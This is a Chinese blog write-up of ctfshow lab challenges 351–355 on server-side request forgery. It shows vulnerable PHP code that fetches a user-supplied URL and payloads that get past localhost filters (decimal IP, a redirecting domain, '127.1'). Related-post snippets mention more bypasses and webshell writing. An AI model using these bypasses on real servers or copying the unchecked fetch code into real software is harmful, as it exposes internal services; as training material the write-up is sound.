ctfshow [web] SSRF 351--355

最新推荐文章于 2024-05-14 08:32:17 发布
最新推荐文章于 2024-05-14 08:32:17 发布
阅读量137 收藏
点赞数
分类专栏: CTF 文章标签: php 服务器 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68906365/article/details/129142244
版权

Web 351

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>

curl_init函数将初始化一个新的会话,返回一个CURL句柄供curl_setopt(), curl_exec(),和 curl_close() 函数使用。

curl_setopt函数为给定的cURL会话句柄设置一个选项。 参考:

curl_exec函数执行一个cURL会话 参考:

curl_close函数关闭一个cURL会话 参考:

代码的大致意思应该就是向POST传入的url请求资源,大概吧...

二、解法

直接访问flag.php

尝试请求本地的flag.php

POST url=127.0.0.1/flag.php

Web 352

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

二、解法

第一个if:url必须要有http或https协议

第二个if:过滤带有localhost或127.0.0.1的url

绕过方式:对127.0.0.1进行进制转换

POST url=http://2130706433/flag.php  等还有很多

Web 353

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);//抓取URL并把它传递给浏览器
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

二、解法

正则过滤了localhost、127、.0、。

依然可以利用进制转换绕过

POST url=http://2130706433/flag.php

Web 354

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

二、解法

正则过滤了localhost和0,1,。且限制只能使用http协议

网上存在一个名为 sudo.cc 的服务,当访问该服务时会自动重定向到127.0.0.1,这个方法可以在过滤localhost或127.0.0.1时使用

POST url=http://sudo.cc/flag.php

Web 355

一、源码

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
?>

二、解法

要求host的长度小于等于5,可以用127.1替换127.0.0.1,效果是一样的

POST url=http://127.1/flag.php

参考文章

1.从一文中了解SSRF的各种绕过姿势及攻击思路_ssrf绕过_quan9i的博客-CSDN博客

D2490
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFshow SSRF(web351-360)
Kradress的博客
03-17 633
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
第三节 SSRF利用 - 内网资源访问-01
09-15
这种攻击形式是指攻击者通过恶意使用存在缺陷的web应用,来攻击远程和本地的服务器。这种攻击方式可以存在于任何语言编写的应用中。 file_get_contents函数 file_get_contents函数是一个php函数,用于从用户指定的...
ctfshow-web354(SSRF)
m0_62094846的博客
06-28 690
法一:sudo.cc相当于127.0.0.1 法二: 改本地域名的A记录到127.0.0.1上,然后访问http://域名/flag.php 即可(也可在自己域名服务器上搭建302跳转)
ctfshow web入门 ssrf web351--web360
最新发布
2301_81040377的博客
05-14 323
我测试了一下会显示504,我以为是环境的问题就没有整了,结果问了大菜鸡师傅,没问题,直接访问shell.php就行,这个故事告诉我们还是要多尝试。127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost。这道题我先是直接想访问flag.php,后来回显说必须是本地,于是payload。ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换。然后访问shell.php进行rce即可。用服务器DNS重定向。
ctfshow-web355,356(SSRF)
m0_62094846的博客
06-28 253
host长度小于5,即127.0.0.1要小于5,可以写成127.1或0
ctfshow——web入门 SSRF
m0_74093152的博客
06-04 715
通过hackbar post提交获得flag。
ctfshow-web351(SSRF)
m0_62094846的博客
06-27 222
flag存在于flag.php中,但是不能用当前的网址,试试本地网址(127.0.0.1)
ssrf-king:用于burp的SSRF插件可在所有请求中自动进行SSRF检测
03-07
:check_mark: 它将很快有一个用户界面来指定您自己的回叫有效负载它将很快能够测试Json和XML 测试SMTP SSRF如何安装/建造git clone https://github.com/ethicalhackingplayground/ssrf-king gradle build 现在可以在...
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
ssrf-req-filter - 防止 SSRF 攻击 :shield: 服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1035
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
【CTFshow】SSRF web351-360wp
weixin_51614272的博客
03-06 337
目录web351、352、353 、355、356web354、357web358web359、360 具体解析请查看这里:点击此处 web351、352、353 、355、356 url=http://0/flag.php url=http://0.0.0.0/flag.php url=http://127.1/flag.php url=http://2130706433/flag.php url=http://017700000001/flag.php url=http://0b111111100000
CTFshow_Web_SSRF——web351~web360(除354、357)
Ho1aAs‘s Blog
03-18 1661
文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完 前言 354和357由于端口改变、服务器所限等原因,无法解出 一、知识点 Ⅰ、SSRF攻击点 <?php $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,
ctfshow SSRF web351-web360 wp
mumuzi的博客
02-10 3616
WDNMD(We Did Nothing Means Done)
ctfshow SSRF web351~360
shinygod的博客
09-25 1271
SSRF练习和学习
web351-360(ctfshow刷题记录)
weixin_52961098的博客
04-09 3950
SSRF web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?>
CTFshow刷题日记-WEB-JWT(web345-350)
Love&Share
09-22 1965
JWT JWT(json web token),令牌以紧凑的形式由三部分组成,这些部分由点(.)分隔 Header Payload Signature header示例 { 'typ': 'JWT', 'alg': 'HS256' } # typ:声明类型 # alg:声明加密的算法 通常直接使用 HMAC SHA256 需要注意的是因为header部分是固定的所以,生成的base64也是固定的以eyJh开头的 payload示例 { "sub": "1234567890", "nam
ctfshow ssrf
08-16
在引用中提到了一系列与SSRF相关的内容,包括web351web352、parse_url以及更改IP地址的写法等。些内容可能是指在CTF比赛中的具体题目或技术细节。 引用提到了SSRF的原理,即通过在URL中加入特殊字符来绕过解析...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值